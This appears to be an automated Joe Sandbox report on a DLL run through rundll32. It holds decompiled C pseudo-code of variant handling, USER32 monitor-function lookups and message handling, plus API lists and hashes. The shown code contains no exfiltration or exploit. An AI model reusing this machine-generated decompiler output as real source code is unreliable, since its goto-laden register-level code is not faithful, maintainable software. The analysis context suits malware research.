                                                                                                                      						__imp__#9(_t300 - 0x44);
                                                                                                                      						_t321 =  *(_t300 + 0xc) - 0x80020009;
                                                                                                                      						if( *(_t300 + 0xc) == 0x80020009) {
                                                                                                                      							goto L50;
                                                                                                                      						}
                                                                                                                      						_push( *(_t300 + 0xc));
                                                                                                                      						goto L49;
                                                                                                                      					} else {
                                                                                                                      						_t295 =  *(_t300 + 0x18);
                                                                                                                      						_t293 = (_t203 << 4) +  *((intOrPtr*)(_t300 - 0x54)) - 0x10;
                                                                                                                      						while(1) {
                                                                                                                      							_t319 =  *_t295;
                                                                                                                      							if( *_t295 == 0) {
                                                                                                                      								goto L46;
                                                                                                                      							}
                                                                                                                      							_t230 =  *_t295;
                                                                                                                      							__eflags = _t230 - 8;
                                                                                                                      							if(_t230 == 8) {
                                                                                                                      								L43:
                                                                                                                      								__imp__#9(_t293);
                                                                                                                      								L44:
                                                                                                                      								_t293 = _t293 - 0x10;
                                                                                                                      								_t295 =  &(_t295[1]);
                                                                                                                      								__eflags = _t295;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      							__eflags = _t230 - 0xe;
                                                                                                                      							if(_t230 != 0xe) {
                                                                                                                      								goto L44;
                                                                                                                      							}
                                                                                                                      							goto L43;
                                                                                                                      						}
                                                                                                                      						goto L46;
                                                                                                                      					}
                                                                                                                      				} else {
                                                                                                                      					_t290 = 0x10;
                                                                                                                      					_t291 = _t194 * _t290 >> 0x20;
                                                                                                                      					_t297 = E100144EC(_t308,  ~(0 | _t308 > 0x00000000) | _t194 * _t290);
                                                                                                                      					 *((intOrPtr*)(_t300 - 0x54)) = _t297;
                                                                                                                      					E10030030(_t293, _t297, _t257,  *(_t300 - 0x4c) << 4);
                                                                                                                      					_t236 =  *(_t300 + 0x18);
                                                                                                                      					_t277 =  *(_t300 - 0x4c) << 4;
                                                                                                                      					_t302 = _t302 + 0x10;
                                                                                                                      					_t36 = _t277 - 0x10; // -16
                                                                                                                      					_t278 = _t297 + _t36;
                                                                                                                      					 *(_t300 - 0x14) = _t236;
                                                                                                                      					 *(_t300 - 0x10) = _t278;
                                                                                                                      					if( *_t236 == 0) {
                                                                                                                      						goto L37;
                                                                                                                      					}
                                                                                                                      					_t237 =  *((intOrPtr*)(_t300 + 0x1c));
                                                                                                                      					_t299 =  &(_t278[4]);
                                                                                                                      					_t258 = _t237 - 4;
                                                                                                                      					 *(_t300 - 0x1c) = _t299;
                                                                                                                      					 *((intOrPtr*)(_t300 + 0x1c)) = _t237 + 0xfffffff8;
                                                                                                                      					do {
                                                                                                                      						_t240 =  *( *(_t300 - 0x14)) & 0x000000ff;
                                                                                                                      						_t279 =  *(_t300 - 0x10);
                                                                                                                      						 *_t279 = _t240;
                                                                                                                      						if((_t240 & 0x00000040) != 0) {
                                                                                                                      							 *_t279 = _t240 & 0x0000ffbf | 0x00004000;
                                                                                                                      						}
                                                                                                                      						_t241 =  *_t279 & 0x0000ffff;
                                                                                                                      						_t313 = _t241 - 0x4002;
                                                                                                                      						if(_t313 > 0) {
                                                                                                                      							_t242 = _t241 - 0x4003;
                                                                                                                      							__eflags = _t242 - 0x12;
                                                                                                                      							if(__eflags > 0) {
                                                                                                                      								goto L35;
                                                                                                                      							}
                                                                                                                      							switch( *((intOrPtr*)(_t242 * 4 +  &M1002E08D))) {
                                                                                                                      								case 0:
                                                                                                                      									goto L34;
                                                                                                                      								case 1:
                                                                                                                      									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
                                                                                                                      									_t258 = _t258 + _t293;
                                                                                                                      									_t244 =  *_t258;
                                                                                                                      									asm("sbb ecx, ecx");
                                                                                                                      									 *_t244 =  ~( *_t244) & 0x0000ffff;
                                                                                                                      									 *_t299 = _t244;
                                                                                                                      									_t245 = E1002CA61(_t300 - 0x34, _t299, _t244, _t244, 0);
                                                                                                                      									 *(_t300 - 4) = 3;
                                                                                                                      									E1002CE83(_t300 - 0x68, _t291, _t300,  *((intOrPtr*)(_t300 - 0x60)), _t245);
                                                                                                                      									__eflags =  *(_t300 - 0x2c);
                                                                                                                      									 *(_t300 - 4) = 1;
                                                                                                                      									if(__eflags != 0) {
                                                                                                                      										_push( *((intOrPtr*)(_t300 - 0x34)));
                                                                                                                      										E10014517(_t258, _t291, _t293, _t299, __eflags);
                                                                                                                      									}
                                                                                                                      									goto L35;
                                                                                                                      								case 2:
                                                                                                                      									goto L35;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							if(_t313 == 0) {
                                                                                                                      								L34:
                                                                                                                      								 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
                                                                                                                      								_t258 = _t258 + _t293;
                                                                                                                      								__eflags = _t258;
                                                                                                                      								 *_t299 =  *_t258;
                                                                                                                      								goto L35;
                                                                                                                      							}
                                                                                                                      							_t250 = _t241;
                                                                                                                      							if(_t250 > 0x13) {
                                                                                                                      								goto L35;
                                                                                                                      							}
                                                                                                                      							switch( *((intOrPtr*)(_t250 * 4 +  &M1002E03D))) {
                                                                                                                      								case 0:
                                                                                                                      									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                                      									__ebx = __ebx + __edi;
                                                                                                                      									__ax =  *__ebx;
                                                                                                                      									goto L28;
                                                                                                                      								case 1:
                                                                                                                      									goto L34;
                                                                                                                      								case 2:
                                                                                                                      									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
                                                                                                                      									__eax =  *(__ebp + 0x1c);
                                                                                                                      									__ebx =  &(__ebx[2]);
                                                                                                                      									 *__esi =  *( *(__ebp + 0x1c));
                                                                                                                      									goto L35;
                                                                                                                      								case 3:
                                                                                                                      									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
                                                                                                                      									__eax =  *(__ebp + 0x1c);
                                                                                                                      									__ebx =  &(__ebx[2]);
                                                                                                                      									 *__esi =  *( *(__ebp + 0x1c));
                                                                                                                      									goto L35;
                                                                                                                      								case 4:
                                                                                                                      									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                                      									__ebx = __ebx + __edi;
                                                                                                                      									__eax =  *__ebx;
                                                                                                                      									goto L17;
                                                                                                                      								case 5:
                                                                                                                      									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                                      									__ebx = __ebx + __edi;
                                                                                                                      									__eax =  *__ebx;
                                                                                                                      									_push(__eax);
                                                                                                                      									 *(__ebp - 0x1c) = __eax;
                                                                                                                      									__imp__#2();
                                                                                                                      									__eflags =  *(__ebp - 0x1c);
                                                                                                                      									 *__esi = __eax;
                                                                                                                      									if(__eflags == 0) {
                                                                                                                      										goto L35;
                                                                                                                      									}
                                                                                                                      									__eflags = __eax;
                                                                                                                      									if(__eflags != 0) {
                                                                                                                      										goto L35;
                                                                                                                      									}
                                                                                                                      									goto L23;
                                                                                                                      								case 6:
                                                                                                                      									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                                      									__ebx = __ebx + __edi;
                                                                                                                      									 *__ebx =  ~( *__ebx);
                                                                                                                      									asm("sbb eax, eax");
                                                                                                                      									L28:
                                                                                                                      									 *__esi = __ax;
                                                                                                                      									goto L35;
                                                                                                                      								case 7:
                                                                                                                      									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
                                                                                                                      									__edi =  *(__ebp - 0x10);
                                                                                                                      									__ebx =  &(__ebx[1]);
                                                                                                                      									__esi =  *__ebx;
                                                                                                                      									asm("movsd");
                                                                                                                      									asm("movsd");
                                                                                                                      									asm("movsd");
                                                                                                                      									asm("movsd");
                                                                                                                      									__esi =  *(__ebp - 0x1c);
                                                                                                                      									_push(4);
                                                                                                                      									_pop(__edi);
                                                                                                                      									goto L35;
                                                                                                                      								case 8:
                                                                                                                      									L24:
                                                                                                                      									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                                      									__ebx = __ebx + __edi;
                                                                                                                      									__eax =  *__ebx;
                                                                                                                      									_push(__eax);
                                                                                                                      									__ecx = __ebp - 0x18;
                                                                                                                      									 *(__ebp - 0x1c) = __eax;
                                                                                                                      									__eax = E100200B9(__ebx, __ecx, __edi, __esi, __eflags);
                                                                                                                      									_push( *(__ebp - 0x18));
                                                                                                                      									 *((char*)(__ebp - 4)) = 2;
                                                                                                                      									__imp__#2();
                                                                                                                      									__eflags =  *(__ebp - 0x1c);
                                                                                                                      									 *__esi = __eax;
                                                                                                                      									if( *(__ebp - 0x1c) == 0) {
                                                                                                                      										L26:
                                                                                                                      										__ecx =  *(__ebp - 0x18);
                                                                                                                      										__eax =  *(__ebp - 0x10);
                                                                                                                      										__ecx =  *(__ebp - 0x18) + 0xfffffff0;
                                                                                                                      										 *( *(__ebp - 0x10)) = 8;
                                                                                                                      										 *((char*)(__ebp - 4)) = 1;
                                                                                                                      										__eax = E100012C0(__ecx);
                                                                                                                      										goto L35;
                                                                                                                      									}
                                                                                                                      									__eflags = __eax;
                                                                                                                      									if(__eflags == 0) {
                                                                                                                      										L23:
                                                                                                                      										__eax = E100201BD(__ecx);
                                                                                                                      										goto L24;
                                                                                                                      									}
                                                                                                                      									goto L26;
                                                                                                                      								case 9:
                                                                                                                      									goto L35;
                                                                                                                      								case 0xa:
                                                                                                                      									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
                                                                                                                      									_t258 = _t258 + _t293;
                                                                                                                      									 *_t299 =  *_t258;
                                                                                                                      									goto L35;
                                                                                                                      								case 0xb:
                                                                                                                      									__eax =  *(__ebp + 0x1c);
                                                                                                                      									__eax =  *(__ebp + 0x1c) + 8;
                                                                                                                      									 *(__ebp + 0x1c) = __eax;
                                                                                                                      									__ebx =  &(__ebx[2]);
                                                                                                                      									__eflags = __ebx;
                                                                                                                      									L17:
                                                                                                                      									__ecx =  *__eax;
                                                                                                                      									 *__esi = __ecx;
                                                                                                                      									 *(__esi + 4) = __eax;
                                                                                                                      									goto L35;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L35:
                                                                                                                      						 *(_t300 - 0x10) =  *(_t300 - 0x10) - 0x10;
                                                                                                                      						_t299 = _t299 - 0x10;
                                                                                                                      						 *(_t300 - 0x14) =  &(( *(_t300 - 0x14))[1]);
                                                                                                                      						 *(_t300 - 0x1c) = _t299;
                                                                                                                      					} while ( *( *(_t300 - 0x14)) != 0);
                                                                                                                      					_t257 = 0;
                                                                                                                      					goto L37;
                                                                                                                      				}
                                                                                                                      			}

































                                                                                                                      0x1002e027
                                                                                                                      0x1002e02a
                                                                                                                      0x1002e02c
                                                                                                                      0x1002e02f
                                                                                                                      0x1002e034
                                                                                                                      0x00000000
                                                                                                                      0x1002e02a
                                                                                                                      0x1002df6a
                                                                                                                      0x1002df8f
                                                                                                                      0x1002df92
                                                                                                                      0x1002df95
                                                                                                                      0x1002df98
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002df9a
                                                                                                                      0x00000000
                                                                                                                      0x1002dfab
                                                                                                                      0x1002dfb2
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002e00f
                                                                                                                      0x1002e012
                                                                                                                      0x1002e015
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002dfca
                                                                                                                      0x1002dfcd
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002dfd4
                                                                                                                      0x1002dfd7
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002dfb7
                                                                                                                      0x1002dfba
                                                                                                                      0x1002dfbd
                                                                                                                      0x1002dfbf
                                                                                                                      0x1002dfc2
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002dfe1
                                                                                                                      0x1002dfe6
                                                                                                                      0x1002dfe9
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002dff1
                                                                                                                      0x1002dff4
                                                                                                                      0x1002dff6
                                                                                                                      0x1002dffa
                                                                                                                      0x1002dffd
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002e001
                                                                                                                      0x1002e004
                                                                                                                      0x1002e007
                                                                                                                      0x1002e008
                                                                                                                      0x1002e009
                                                                                                                      0x1002e00a
                                                                                                                      0x1002e00b
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002dfa7
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002df9a
                                                                                                                      0x1002df6e
                                                                                                                      0x1002df73
                                                                                                                      0x1002df79
                                                                                                                      0x1002df7b
                                                                                                                      0x1002df7d
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002df83
                                                                                                                      0x1002df89
                                                                                                                      0x1002dea1
                                                                                                                      0x1002dea1
                                                                                                                      0x1002dea6
                                                                                                                      0x1002dea6
                                                                                                                      0x1002dea9
                                                                                                                      0x1002deb2
                                                                                                                      0x1002deb2
                                                                                                                      0x1002deb7
                                                                                                                      0x1002debd
                                                                                                                      0x1002dec0
                                                                                                                      0x1002dec2
                                                                                                                      0x1002dec6
                                                                                                                      0x1002dec8
                                                                                                                      0x1002ded0
                                                                                                                      0x1002ded1
                                                                                                                      0x1002ded7
                                                                                                                      0x1002ded7
                                                                                                                      0x1002ded9
                                                                                                                      0x1002dedf
                                                                                                                      0x1002dee5
                                                                                                                      0x1002deed
                                                                                                                      0x1002def5
                                                                                                                      0x1002def8
                                                                                                                      0x1002def8
                                                                                                                      0x1002df03
                                                                                                                      0x1002df09
                                                                                                                      0x1002df0b
                                                                                                                      0x1002df12
                                                                                                                      0x1002df17
                                                                                                                      0x1002df1a
                                                                                                                      0x1002df1a
                                                                                                                      0x1002df22
                                                                                                                      0x1002df24
                                                                                                                      0x1002df2b
                                                                                                                      0x1002df30
                                                                                                                      0x1002df33
                                                                                                                      0x1002df33
                                                                                                                      0x1002df3b
                                                                                                                      0x1002df40
                                                                                                                      0x1002df46
                                                                                                                      0x1002df52
                                                                                                                      0x1002df55
                                                                                                                      0x00000000
                                                                                                                      0x1002df55
                                                                                                                      0x1002de8f
                                                                                                                      0x1002de95
                                                                                                                      0x1002de9c
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002de9e
                                                                                                                      0x00000000
                                                                                                                      0x1002de4d
                                                                                                                      0x1002de50
                                                                                                                      0x1002de56
                                                                                                                      0x1002de71
                                                                                                                      0x1002de71
                                                                                                                      0x1002de74
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002de5c
                                                                                                                      0x1002de5e
                                                                                                                      0x1002de60
                                                                                                                      0x1002de66
                                                                                                                      0x1002de67
                                                                                                                      0x1002de6d
                                                                                                                      0x1002de6d
                                                                                                                      0x1002de70
                                                                                                                      0x1002de70
                                                                                                                      0x00000000
                                                                                                                      0x1002de70
                                                                                                                      0x1002de62
                                                                                                                      0x1002de64
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002de64
                                                                                                                      0x00000000
                                                                                                                      0x1002de71
                                                                                                                      0x1002dbd0
                                                                                                                      0x1002dbd4
                                                                                                                      0x1002dbd5
                                                                                                                      0x1002dbe4
                                                                                                                      0x1002dbef
                                                                                                                      0x1002dbf2
                                                                                                                      0x1002dbfa
                                                                                                                      0x1002dbfd
                                                                                                                      0x1002dc00
                                                                                                                      0x1002dc06
                                                                                                                      0x1002dc06
                                                                                                                      0x1002dc0a
                                                                                                                      0x1002dc0d
                                                                                                                      0x1002dc10
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002dc16
                                                                                                                      0x1002dc1b
                                                                                                                      0x1002dc1e
                                                                                                                      0x1002dc24
                                                                                                                      0x1002dc27
                                                                                                                      0x1002dc2a
                                                                                                                      0x1002dc2d
                                                                                                                      0x1002dc33
                                                                                                                      0x1002dc36
                                                                                                                      0x1002dc39
                                                                                                                      0x1002dc43
                                                                                                                      0x1002dc43
                                                                                                                      0x1002dc46
                                                                                                                      0x1002dc4e
                                                                                                                      0x1002dc50
                                                                                                                      0x1002dd6d
                                                                                                                      0x1002dd72
                                                                                                                      0x1002dd75
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002dd77
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002dd7e
                                                                                                                      0x1002dd81
                                                                                                                      0x1002dd83
                                                                                                                      0x1002dd89
                                                                                                                      0x1002dd93
                                                                                                                      0x1002dd9a
                                                                                                                      0x1002dd9c
                                                                                                                      0x1002dda8
                                                                                                                      0x1002ddac
                                                                                                                      0x1002ddb1
                                                                                                                      0x1002ddb5
                                                                                                                      0x1002ddb9
                                                                                                                      0x1002ddbb
                                                                                                                      0x1002ddbe
                                                                                                                      0x1002ddc3
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1002dc56
                                                                                                                      0x1002dc56
                                                                                                                      0x1002ddc6
                                                                                                                      0x1002ddc6

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: String$Variant$ClearFree_memset$ChangeException@8H_prolog3ThrowTypelstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4128688680-0
                                                                                                                      • Opcode ID: 6192f18373e1637f38ae635fdb485c2c49157f7b8aa44aff1f0335ddf822a966
                                                                                                                      • Instruction ID: 42fa242583032f4c72b1ee8c19c4a820194bcb4b4a787a5525753aa98076571e
                                                                                                                      • Opcode Fuzzy Hash: 6192f18373e1637f38ae635fdb485c2c49157f7b8aa44aff1f0335ddf822a966
                                                                                                                      • Instruction Fuzzy Hash: 5EF18A7490025ADFDF11DFA8D880AEEBBB4FF05300F90406AE951AB2A1D774AE56CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E10018B59() {
                                                                                                                      				void* __ebx;
                                                                                                                      				void* __esi;
                                                                                                                      				struct HINSTANCE__* _t5;
                                                                                                                      				_Unknown_base(*)()* _t6;
                                                                                                                      				_Unknown_base(*)()* _t7;
                                                                                                                      				_Unknown_base(*)()* _t8;
                                                                                                                      				_Unknown_base(*)()* _t9;
                                                                                                                      				_Unknown_base(*)()* _t10;
                                                                                                                      				_Unknown_base(*)()* _t11;
                                                                                                                      				_Unknown_base(*)()* _t12;
                                                                                                                      				struct HINSTANCE__* _t18;
                                                                                                                      				void* _t20;
                                                                                                                      				intOrPtr _t23;
                                                                                                                      				_Unknown_base(*)()* _t24;
                                                                                                                      
                                                                                                                      				_t23 =  *0x100572e4; // 0x0
                                                                                                                      				if(_t23 == 0) {
                                                                                                                      					_push(_t20);
                                                                                                                      					 *0x100572e8 = E10018B01(0, _t20, __eflags);
                                                                                                                      					_t18 = GetModuleHandleA("USER32");
                                                                                                                      					__eflags = _t18;
                                                                                                                      					if(_t18 == 0) {
                                                                                                                      						L12:
                                                                                                                      						 *0x100572c8 = 0;
                                                                                                                      						 *0x100572cc = 0;
                                                                                                                      						 *0x100572d0 = 0;
                                                                                                                      						 *0x100572d4 = 0;
                                                                                                                      						 *0x100572d8 = 0;
                                                                                                                      						 *0x100572dc = 0;
                                                                                                                      						 *0x100572e0 = 0;
                                                                                                                      						_t5 = 0;
                                                                                                                      					} else {
                                                                                                                      						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
                                                                                                                      						__eflags = _t6;
                                                                                                                      						 *0x100572c8 = _t6;
                                                                                                                      						if(_t6 == 0) {
                                                                                                                      							goto L12;
                                                                                                                      						} else {
                                                                                                                      							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
                                                                                                                      							__eflags = _t7;
                                                                                                                      							 *0x100572cc = _t7;
                                                                                                                      							if(_t7 == 0) {
                                                                                                                      								goto L12;
                                                                                                                      							} else {
                                                                                                                      								_t8 = GetProcAddress(_t18, "MonitorFromRect");
                                                                                                                      								__eflags = _t8;
                                                                                                                      								 *0x100572d0 = _t8;
                                                                                                                      								if(_t8 == 0) {
                                                                                                                      									goto L12;
                                                                                                                      								} else {
                                                                                                                      									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
                                                                                                                      									__eflags = _t9;
                                                                                                                      									 *0x100572d4 = _t9;
                                                                                                                      									if(_t9 == 0) {
                                                                                                                      										goto L12;
                                                                                                                      									} else {
                                                                                                                      										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
                                                                                                                      										__eflags = _t10;
                                                                                                                      										 *0x100572dc = _t10;
                                                                                                                      										if(_t10 == 0) {
                                                                                                                      											goto L12;
                                                                                                                      										} else {
                                                                                                                      											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
                                                                                                                      											__eflags = _t11;
                                                                                                                      											 *0x100572d8 = _t11;
                                                                                                                      											if(_t11 == 0) {
                                                                                                                      												goto L12;
                                                                                                                      											} else {
                                                                                                                      												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
                                                                                                                      												__eflags = _t12;
                                                                                                                      												 *0x100572e0 = _t12;
                                                                                                                      												if(_t12 == 0) {
                                                                                                                      													goto L12;
                                                                                                                      												} else {
                                                                                                                      													_t5 = 1;
                                                                                                                      													__eflags = 1;
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					 *0x100572e4 = 1;
                                                                                                                      					return _t5;
                                                                                                                      				} else {
                                                                                                                      					_t24 =  *0x100572d8; // 0x0
                                                                                                                      					return 0 | _t24 != 0x00000000;
                                                                                                                      				}
                                                                                                                      			}


















                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,754A7F34,10018CA5,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018B82
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemMetrics,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018B9E
                                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromWindow,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BAF
                                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromRect,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BC0
                                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromPoint,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BD1
                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BE2
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BF3
                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018C04
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                      • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                                      • API String ID: 667068680-68207542
                                                                                                                      • Opcode ID: ef20b1205fbe14ac9d2a40522549883dc0a7ccf4399eb4921ca3be0b95f38340
                                                                                                                      • Instruction ID: 77f58ff47d83721d02e0aa712f7cb6554a3c60b1de10c844b6b889dbd48dd915
                                                                                                                      • Opcode Fuzzy Hash: ef20b1205fbe14ac9d2a40522549883dc0a7ccf4399eb4921ca3be0b95f38340
                                                                                                                      • Instruction Fuzzy Hash: 40213071902121AAE751DF25ADC046DBAEAF349280F61093FF10CD6560D7309AC6AFA9
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 83%
                                                                                                                      			E1002A778(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, struct tagMSG* _a8, intOrPtr _a12) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v24;
                                                                                                                      				int _v28;
                                                                                                                      				intOrPtr _v32;
                                                                                                                      				intOrPtr _v36;
                                                                                                                      				intOrPtr _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				struct HWND__* _v52;
                                                                                                                      				signed int _t139;
                                                                                                                      				signed int _t141;
                                                                                                                      				void* _t142;
                                                                                                                      				signed int _t146;
                                                                                                                      				signed int _t149;
                                                                                                                      				intOrPtr _t150;
                                                                                                                      				signed int _t152;
                                                                                                                      				signed char _t153;
                                                                                                                      				signed int _t154;
                                                                                                                      				signed int _t155;
                                                                                                                      				int _t156;
                                                                                                                      				signed int _t161;
                                                                                                                      				signed int _t165;
                                                                                                                      				void* _t167;
                                                                                                                      				signed char _t171;
                                                                                                                      				signed int _t172;
                                                                                                                      				signed int _t173;
                                                                                                                      				signed int _t174;
                                                                                                                      				signed char _t182;
                                                                                                                      				intOrPtr _t183;
                                                                                                                      				signed int _t184;
                                                                                                                      				short _t188;
                                                                                                                      				signed int _t189;
                                                                                                                      				signed int _t190;
                                                                                                                      				signed int _t191;
                                                                                                                      				signed int _t195;
                                                                                                                      				signed int _t198;
                                                                                                                      				signed char _t199;
                                                                                                                      				signed int _t200;
                                                                                                                      				signed int _t201;
                                                                                                                      				short _t204;
                                                                                                                      				signed int _t206;
                                                                                                                      				signed int _t207;
                                                                                                                      				signed int _t208;
                                                                                                                      				signed int _t209;
                                                                                                                      				void* _t211;
                                                                                                                      				signed int _t215;
                                                                                                                      				signed int _t216;
                                                                                                                      				struct HWND__* _t217;
                                                                                                                      				struct tagMSG* _t221;
                                                                                                                      				intOrPtr _t224;
                                                                                                                      				void* _t231;
                                                                                                                      				struct tagMSG* _t240;
                                                                                                                      				signed int _t242;
                                                                                                                      				int _t243;
                                                                                                                      				signed int _t244;
                                                                                                                      				long _t247;
                                                                                                                      				intOrPtr _t249;
                                                                                                                      				signed int _t251;
                                                                                                                      				signed int _t254;
                                                                                                                      				signed int _t255;
                                                                                                                      				signed int _t256;
                                                                                                                      				signed int _t257;
                                                                                                                      				signed int _t258;
                                                                                                                      				void* _t260;
                                                                                                                      				void* _t262;
                                                                                                                      
                                                                                                                      				_t232 = __ecx;
                                                                                                                      				_t260 = _t262;
                                                                                                                      				_push(__ecx);
                                                                                                                      				_v8 = _v8 & 0x00000000;
                                                                                                                      				_push(__ebx);
                                                                                                                      				_push(__esi);
                                                                                                                      				_push(__edi);
                                                                                                                      				_t139 = E1002A5D5(_a4, _a8);
                                                                                                                      				_t238 = _t139;
                                                                                                                      				if(_t139 == 0) {
                                                                                                                      					_t232 = _a4;
                                                                                                                      					_t231 = E100199B2(_a4);
                                                                                                                      					if(_t231 != 0) {
                                                                                                                      						_t221 =  *((intOrPtr*)(_t231 + 0x44));
                                                                                                                      						_a8 = _t221;
                                                                                                                      						if(_t221 != 0) {
                                                                                                                      							while(1) {
                                                                                                                      								_t9 = _t231 + 0x40; // 0x40
                                                                                                                      								_t232 = _t9;
                                                                                                                      								_t258 =  *(E10017B95( &_a8));
                                                                                                                      								_t224 =  *((intOrPtr*)(_t258 + 4));
                                                                                                                      								if(_t224 != 0 && _t224 ==  *((intOrPtr*)(_t231 + 0x70))) {
                                                                                                                      									break;
                                                                                                                      								}
                                                                                                                      								if( *_t258 == 0 ||  *_t258 != GetFocus()) {
                                                                                                                      									if(_a8 != 0) {
                                                                                                                      										continue;
                                                                                                                      									} else {
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									break;
                                                                                                                      								}
                                                                                                                      								goto L10;
                                                                                                                      							}
